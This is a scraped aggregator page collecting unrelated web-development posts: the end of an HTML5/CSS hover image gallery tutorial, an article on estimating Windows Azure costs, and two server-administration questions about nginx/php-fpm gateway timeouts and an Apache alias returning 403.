picture</h2></header><ul id="column1"><li><a href="http://weblogs.asp.net/controlpanel/blogs/posteditor.aspx?SelectedNavItem=Posts§ionid=1153&postid=8927200#"><img src="thumbs/john-barnes.jpg" alt=""><img class="large" src="large-images/john-barnes-large.jpg" alt=""></a></li><li><a href="http://weblogs.asp.net/controlpanel/blogs/posteditor.aspx?SelectedNavItem=Posts§ionid=1153&postid=8927200#"><img src="thumbs/ian-rush.jpg" alt=""><img class="large" src="large-images/ian-rush-large.jpg" alt=""></a></li><li><a href="http://weblogs.asp.net/controlpanel/blogs/posteditor.aspx?SelectedNavItem=Posts§ionid=1153&postid=8927200#"><img src="thumbs/graeme-souness.jpg" alt=""><img class="large" src="large-images/graeme-souness-large.jpg" alt=""></a></li></ul><ul id="column2"><li><a href="http://weblogs.asp.net/controlpanel/blogs/posteditor.aspx?SelectedNavItem=Posts§ionid=1153&postid=8927200#"><img src="thumbs/steven-gerrard.jpg" alt=""><img class="large" src="large-images/steven-gerrard-large.jpg" alt=""></a></li><li><a href="http://weblogs.asp.net/controlpanel/blogs/posteditor.aspx?SelectedNavItem=Posts§ionid=1153&postid=8927200#"><img src="thumbs/kenny-dalglish.jpg" alt=""><img class="large" src="large-images/kenny-dalglish-large.jpg" alt=""></a></li><li><a href="http://weblogs.asp.net/controlpanel/blogs/posteditor.aspx?SelectedNavItem=Posts§ionid=1153&postid=8927200#"><img src="thumbs/robbie-fowler.jpg" alt=""><img class="large" src="large-images/robbie-fowler-large.jpg" alt=""></a></li></ul><ul id="column3"><li><a href="http://weblogs.asp.net/controlpanel/blogs/posteditor.aspx?SelectedNavItem=Posts§ionid=1153&postid=8927200#"><img src="thumbs/alan-hansen.jpg" alt=""><img class="large" src="large-images/alan-hansen-large.jpg" alt=""></a></li><li><a href="http://weblogs.asp.net/controlpanel/blogs/posteditor.aspx?SelectedNavItem=Posts§ionid=1153&postid=8927200#"><img src="thumbs/michael-owen.jpg" alt=""><img class="large" src="large-images/michael-owen-large.jpg" alt=""></a></li></ul></body></html> It is very easy to follow the markup. Please have a look at the new doctype and the new semantic tag <header>. I have 3 columns and I place my images in there.There is a class called "large".I will use this class in my CSS code to hide the large image when the mouse is not on (hover) an image Make sure you validate your HTML 5 page in the validator found hereHave a look at the CSS code below that makes it all happen.img { border:none;}#column1 { position: absolute; top: 30; left: 100; }li { margin: 15px; list-style-type:none;}#column1 a img.large {  position: absolute; top: 0; left:700px; visibility: hidden;}#column1 a:hover { background: white;}#column1 a:hover img.large { visibility:visible;}#column2 { position: absolute; top: 30; left: 195px; }li { margin: 5px; list-style-type:none;}#column2 a img.large { position: absolute; top: 0; left:510px; margin-left:0; visibility: hidden;}#column2 a:hover { background: white;}#column2 a:hover img.large { visibility:visible;}#column3 { position: absolute; top: 30; left: 400px; width:108px;}li { margin: 5px; list-style-type:none;}#column3 a img.large { width: 260px; height:260px; position: absolute; top: 0; left:315px; margin-left:0; visibility: hidden;}#column3 a:hover { background: white;}#column3 a:hover img.large { visibility:visible;}?n the first line of the CSS code I set the images to have no border.Then I place the first column in the page and then remove the bullets from the list elements.Then I use the large CSS class to create a position for the large image and hide it.Finally when the hover event takes place I make the image visible.I repeat the process for the next two columns. I have tested the page with IE 10 and the latest versions of Opera,Chrome and Firefox.Feel free to style your HTML 5 gallery any way you want through the magic of CSS.I did not bother adding background colors and borders because that was beyond the scope of this post. Hope it helps!!!!

    Read the article

  • Developing a Cost Model for Cloud Applications

    - by BuckWoody
    Note - please pay attention to the date of this post. As much as I attempt to make the information below accurate, the nature of distributed computing means that components, units and pricing will change over time. The definitive costs for Microsoft Windows Azure and SQL Azure are located here, and are more accurate than anything you will see in this post: http://www.microsoft.com/windowsazure/offers/  When writing software that is run on a Platform-as-a-Service (PaaS) offering like Windows Azure / SQL Azure, one of the questions you must answer is how much the system will cost. I will not discuss the comparisons between on-premise costs (which are nigh impossible to calculate accurately) versus cloud costs, but instead focus on creating a general model for estimating costs for a given application. You should be aware that there are (at this writing) two billing mechanisms for Windows and SQL Azure: “Pay-as-you-go” or consumption, and “Subscription” or commitment. Conceptually, you can consider the former a pay-as-you-go cell phone plan, where you pay by the unit used (at a slightly higher rate) and the latter as a standard cell phone plan where you commit to a contract and thus pay lower rates. In this post I’ll stick with the pay-as-you-go mechanism for simplicity, which should be the maximum cost you would pay. From there you may be able to get a lower cost if you use the other mechanism. In any case, the model you create should hold. Developing a good cost model is essential. As a developer or architect, you’ll most certainly be asked how much something will cost, and you need to have a reliable way to estimate that. Businesses and Organizations have been used to paying for servers, software licenses, and other infrastructure as an up-front cost, and power, people to the systems and so on as an ongoing (and sometimes not factored) cost. When presented with a new paradigm like distributed computing, they may not understand the true cost/value proposition, and that’s where the architect and developer can guide the conversation to make a choice based on features of the application versus the true costs. The two big buckets of use-types for these applications are customer-based and steady-state. In the customer-based use type, each successful use of the program results in a sale or income for your organization. Perhaps you’ve written an application that provides the spot-price of foo, and your customer pays for the use of that application. In that case, once you’ve estimated your cost for a successful traversal of the application, you can build that into the price you charge the user. It’s a standard restaurant model, where the price of the meal is determined by the cost of making it, plus any profit you can make. In the second use-type, the application will be used by a more-or-less constant number of processes or users and no direct revenue is attached to the system. A typical example is a customer-tracking system used by the employees within your company. In this case, the cost model is often created “in reverse” - meaning that you pilot the application, monitor the use (and costs) and that cost is held steady. This is where the comparison with an on-premise system becomes necessary, even though it is more difficult to estimate those on-premise true costs. For instance, do you know exactly how much cost the air conditioning is because you have a team of system administrators? This may sound trivial, but that, along with the insurance for the building, the wiring, and every other part of the system is in fact a cost to the business. There are three primary methods that I’ve been successful with in estimating the cost. None are perfect, all are demand-driven. The general process is to lay out a matrix of: components units cost per unit and then multiply that times the usage of the system, based on which components you use in the program. That sounds a bit simplistic, but using those metrics in a calculation becomes more detailed. In all of the methods that follow, you need to know your application. The components for a PaaS include computing instances, storage, transactions, bandwidth and in the case of SQL Azure, database size. In most cases, architects start with the first model and progress through the other methods to gain accuracy. Simple Estimation The simplest way to calculate costs is to architect the application (even UML or on-paper, no coding involved) and then estimate which of the components you’ll use, and how much of each will be used. Microsoft provides two tools to do this - one is a simple slider-application located here: http://www.microsoft.com/windowsazure/pricing-calculator/  The other is a tool you download to create an “Return on Investment” (ROI) spreadsheet, which has the advantage of leading you through various questions to estimate what you plan to use, located here: https://roianalyst.alinean.com/msft/AutoLogin.do?d=176318219048082115  You can also just create a spreadsheet yourself with a structure like this: Program Element Azure Component Unit of Measure Cost Per Unit Estimated Use of Component Total Cost Per Component Cumulative Cost               Of course, the consideration with this model is that it is difficult to predict a system that is not running or hasn’t even been developed. Which brings us to the next model type. Measure and Project A more accurate model is to actually write the code for the application, using the Software Development Kit (SDK) which can run entirely disconnected from Azure. The code should be instrumented to estimate the use of the application components, logging to a local file on the development system. A series of unit and integration tests should be run, which will create load on the test system. You can use standard development concepts to track this usage, and even use Windows Performance Monitor counters. The best place to start with this method is to use the Windows Azure Diagnostics subsystem in your code, which you can read more about here: http://blogs.msdn.com/b/sumitm/archive/2009/11/18/introducing-windows-azure-diagnostics.aspx This set of API’s greatly simplifies tracking the application, and in fact you can use this information for more than just a cost model. After you have the tracking logs, you can plug the numbers into ay of the tools above, which should give a representative cost or in some cases a unit cost. The consideration with this model is that the SDK fabric is not a one-to-one comparison with performance on the actual Windows Azure fabric. Those differences are usually smaller, but they do need to be considered. Also, you may not be able to accurately predict the load on the system, which might lead to an architectural change, which changes the model. This leads us to the next, most accurate method for a cost model. Sample and Estimate Using standard statistical and other predictive math, once the application is deployed you will get a bill each month from Microsoft for your Azure usage. The bill is quite detailed, and you can export the data from it to do analysis, and using methods like regression and so on project out into the future what the costs will be. I normally advise that the architect also extrapolate a unit cost from those metrics as well. This is the information that should be reported back to the executives that pay the bills: the past cost, future projected costs, and unit cost “per click” or “per transaction”, as your case warrants. The challenge here is in the model itself - statistical methods are not foolproof, and the larger the sample (in this case I recommend the entire population, not a smaller sample) is key. References and Tools Articles: http://blogs.msdn.com/b/patrick_butler_monterde/archive/2010/02/10/windows-azure-billing-overview.aspx http://technet.microsoft.com/en-us/magazine/gg213848.aspx http://blog.codingoutloud.com/2011/06/05/azure-faq-how-much-will-it-cost-me-to-run-my-application-on-windows-azure/ http://blogs.msdn.com/b/johnalioto/archive/2010/08/25/10054193.aspx http://geekswithblogs.net/iupdateable/archive/2010/02/08/qampa-how-can-i-calculate-the-tco-and-roi-when.aspx   Other Tools: http://cloud-assessment.com/ http://communities.quest.com/community/cloud_tools

    Read the article

  • Nginx + php-fpm "504 Gateway Time-out" error with almost zero load (on a test-server)

    - by rahul286
    After debugging for 6-hours - I am giving this up :| We have a nginx+php-fpm+mysql in LAN with almost 100 wordpress (created and used by different designers/developers all working on test wordpres setup) We are using nginx without any issues from long. Today, all of a sudden - nginx started returning "504 Gateway Time-out" out of the blue... I checked nginx error log for a virtual host... 2010/09/06 21:24:24 [error] 12909#0: *349 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 192.168.0.1, server: rahul286.rtcamp.info, request: "GET /favicon.ico HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "rahul286.rtcamp.info" 2010/09/06 21:25:11 [error] 12909#0: *349 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 192.168.0.1, server: rahul286.rtcamp.info, request: "GET /favicon.ico HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "rahul286.rtcamp.info" 2010/09/06 21:25:11 [error] 12909#0: *443 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 192.168.0.1, server: rahul286.rtcamp.info, request: "GET /info.php HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "rahul286.rtcamp.info" 2010/09/06 21:25:12 [error] 12909#0: *443 connect() failed (111: Connection refused) while connecting to upstream, client: 192.168.0.1, server: rahul286.rtcamp.info, request: "GET /favicon.ico HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "rahul286.rtcamp.info" 2010/09/06 22:08:32 [error] 12909#0: *1025 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 192.168.0.1, server: rahul286.rtcamp.info, request: "GET / HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "rahul286.rtcamp.info" 2010/09/06 22:09:33 [error] 12909#0: *1025 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 192.168.0.1, server: rahul286.rtcamp.info, request: "GET /favicon.ico HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "rahul286.rtcamp.info" 2010/09/06 22:09:40 [error] 12909#0: *1064 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 192.168.0.1, server: rahul286.rtcamp.info, request: "GET /info.php HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "rahul286.rtcamp.info" 2010/09/06 22:09:40 [error] 12909#0: *1064 connect() failed (111: Connection refused) while connecting to upstream, client: 192.168.0.1, server: rahul286.rtcamp.info, request: "GET /favicon.ico HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "rahul286.rtcamp.info" 2010/09/06 22:24:44 [error] 12909#0: *1313 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 192.168.0.1, server: rahul286.rtcamp.info, request: "GET / HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "rahul286.rtcamp.info" 2010/09/06 22:24:53 [error] 12909#0: *1313 recv() failed (104: Connection reset by peer) while reading response header from upstream, client: 192.168.0.1, server: rahul286.rtcamp.info, request: "GET /favicon.ico HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "rahul286.rtcamp.info" As I run php-fpm on port 9000 via TCP mode, I ran "netstat | grep 9000" and noticed something unusual... (Pasting partial output here for ease of read) tcp 9 0 localhost:9000 localhost:36094 CLOSE_WAIT 14269/php5-fpm tcp 0 0 localhost:46664 localhost:9000 FIN_WAIT2 - tcp 1257 0 localhost:9000 localhost:36135 CLOSE_WAIT - tcp 1257 0 localhost:9000 localhost:36125 CLOSE_WAIT - tcp 9 0 localhost:9000 localhost:36102 CLOSE_WAIT 14268/php5-fpm tcp 0 0 localhost:46662 localhost:9000 FIN_WAIT2 - tcp 745 0 localhost:9000 localhost:46644 CLOSE_WAIT - tcp 0 0 localhost:46658 localhost:9000 FIN_WAIT2 - tcp 1265 0 localhost:9000 localhost:46607 CLOSE_WAIT - tcp 0 0 localhost:46672 localhost:9000 ESTABLISHED 12909/nginx: worker tcp 1257 0 localhost:9000 localhost:36119 CLOSE_WAIT - tcp 1265 0 localhost:9000 localhost:46613 CLOSE_WAIT - tcp 0 0 localhost:46646 localhost:9000 FIN_WAIT2 - tcp 1257 0 localhost:9000 localhost:36137 CLOSE_WAIT - tcp 0 0 localhost:46670 localhost:9000 ESTABLISHED 12909/nginx: worker tcp 1265 0 localhost:9000 localhost:46619 CLOSE_WAIT - tcp 1336 0 localhost:9000 localhost:46668 ESTABLISHED - tcp 0 0 localhost:46648 localhost:9000 FIN_WAIT2 - tcp 1336 0 localhost:9000 localhost:46670 ESTABLISHED - tcp 9 0 localhost:9000 localhost:36108 CLOSE_WAIT 14274/php5-fpm tcp 1336 0 localhost:9000 localhost:46684 ESTABLISHED - tcp 0 0 localhost:46674 localhost:9000 ESTABLISHED 12909/nginx: worker tcp 1336 0 localhost:9000 localhost:46666 ESTABLISHED - tcp 1257 0 localhost:9000 localhost:46648 CLOSE_WAIT - tcp 1336 0 localhost:9000 localhost:46678 ESTABLISHED - tcp 0 0 localhost:46668 localhost:9000 ESTABLISHED 12909/nginx: wo There are plenty of "CLOSE_WAIT" & "FIN_WAIT2" pairs as highlighted below (in above output): tcp 1337 0 localhost:9000 localhost:46680 CLOSE_WAIT - tcp 0 0 localhost:46680 localhost:9000 FIN_WAIT2 - Please note port 46680 in above. I enabled mysql slow queries error log, but it didn't work. As of now restarting php5-fpm every minute via a cronjob (see command below) keeping everything running "smoothly" but I hate patchwork and want to solve this... 1 * * * * service php5-fpm restart > /dev/null I searched extensively on Google - got no help. As mentioned, this a test-server in LAN, CPU load is never crossed 0.10 and memory usage is also below 25% (System has 2GB RAM and ubuntu-server installed) So if you find its time-confusing to help me out, please atleast drop a hint. Thanks in advance for help. -Rahul (note - this is reposting of - http://forum.nginx.org/read.php?11,127694) Update: I found answer, which is posted below.

    Read the article

  • Create an Alias Directory inside a Virtual Host

    - by Praveen Kumar
    First, let me say, I asked this question in StackOverflow, and thought I could get more replies here. I checked here, here, here, here, here, and here before asking this question. I guess my search skills are weak. I am using the WampServer version 2.2e. I have a need like, I need a virtual path inside a virtual host. Let me say the two hosts that I have. Primary Virtual Host (Localhost) NameVirtualHost *:80 <VirtualHost *:80> ServerName localhost DocumentRoot "C:/Wamp/www" </VirtualHost> My Apps Virtual Hosts <VirtualHost *:80> ServerName apps.ptrl DocumentRoot "C:/Wamp/vhosts/ptrl/apps" ErrorLog "logs/apps-ptrl-error.log" CustomLog "logs/apps-ptrl-access.log" common <Directory "C:/Wamp/vhosts/ptrl/apps"> allow from all order allow,deny AllowOverride All </Directory> DirectoryIndex index.html index.htm index.php </VirtualHost> My Blog Virtual Host <VirtualHost *:80> ServerName blog.praveen-kumar.ptrl DocumentRoot "C:/Wamp/vhosts/ptrl/praveen-kumar/blog" ErrorLog "logs/praveen-kumar-ptrl-error.log" CustomLog "logs/praveen-kumar-ptrl-access.log" common <Directory "C:/Wamp/vhosts/ptrl/praveen-kumar/blog"> allow from all order allow,deny AllowOverride All </Directory> DirectoryIndex index.html index.htm index.php </VirtualHost> My requirement now is to have http://apps.ptrl/blog/ and http://blog.praveen-kumar.ptrl/ should be the same directory. One thing I thought of is, moving the blog folder inside the apps folder, but it is connected with Git and other stuffs are there, so it is not possible to move the folder. So, I thought of creating an alias to the VirtualHost in this way: <VirtualHost *:80> ServerName apps.ptrl DocumentRoot "C:/Wamp/vhosts/ptrl/apps" ErrorLog "logs/apps-ptrl-error.log" CustomLog "logs/apps-ptrl-access.log" common <Directory "C:/Wamp/vhosts/ptrl/apps"> allow from all order allow,deny AllowOverride All </Directory> DirectoryIndex index.html index.htm index.php # The alias to the blog! Alias /blog "C:/Wamp/vhosts/ptrl/praveen-kumar/blog" <Directory "C:/Wamp/vhosts/ptrl/praveen-kumar/blog"> allow from all order allow,deny AllowOverride All </Directory> </VirtualHost> But when I tried to access http://apps.ptrl/blog, I am getting an Error 403 Forbidden page. Am I doing the right thing? If you need to look at the access log, and error log, they are here: # Access Log 127.0.0.1 - - [14/Oct/2012:09:53:11 +0530] "GET /blog HTTP/1.1" 403 206 127.0.0.1 - - [14/Oct/2012:09:53:11 +0530] "GET /favicon.ico HTTP/1.1" 404 209 127.0.0.1 - - [14/Oct/2012:09:53:53 +0530] "GET / HTTP/1.1" 200 6935 127.0.0.1 - - [14/Oct/2012:09:53:53 +0530] "GET /app/blog/thumb.png HTTP/1.1" 404 216 # Error Log [Sun Oct 14 09:53:11 2012] [error] [client 127.0.0.1] client denied by server configuration: C:/Wamp/vhosts/ptrl/praveen-kumar/blog [Sun Oct 14 09:53:11 2012] [error] [client 127.0.0.1] File does not exist: C:/Wamp/vhosts/ptrl/apps/favicon.ico [Sun Oct 14 09:53:53 2012] [error] [client 127.0.0.1] File does not exist: C:/Wamp/vhosts/ptrl/apps/app/blog, referer: http://apps.ptrl/ Waiting eagerly for some help. I am ready to provide more info, if needed. Update #1: Changed VirtualHosts: <VirtualHost *:80> ServerName apps.ptrl DocumentRoot "C:/Wamp/vhosts/ptrl/apps" ErrorLog "logs/apps-ptrl-error.log" CustomLog "logs/apps-ptrl-access.log" common # The alias to the blog! Alias /blog "C:/Wamp/vhosts/ptrl/praveen-kumar/blog" <Directory "C:/Wamp/vhosts/ptrl/praveen-kumar/blog"> allow from all order allow,deny AllowOverride All </Directory> <Directory "C:/Wamp/vhosts/ptrl/apps"> allow from all order allow,deny AllowOverride All </Directory> DirectoryIndex index.html index.htm index.php </VirtualHost> The issue now: I am able to access the site. The physical links are working now. i.e., I am able to open http://apps.ptrl/blog/index.php but not http://apps.ptrl/blog/view-1.ptf, which gets translated to http://apps.ptrl/blog/index.php?page=view&id=1. Any solutions?

    Read the article

< Previous Page | 312 313 314 315 316 317 318 319 320 321 322 323  | Next Page >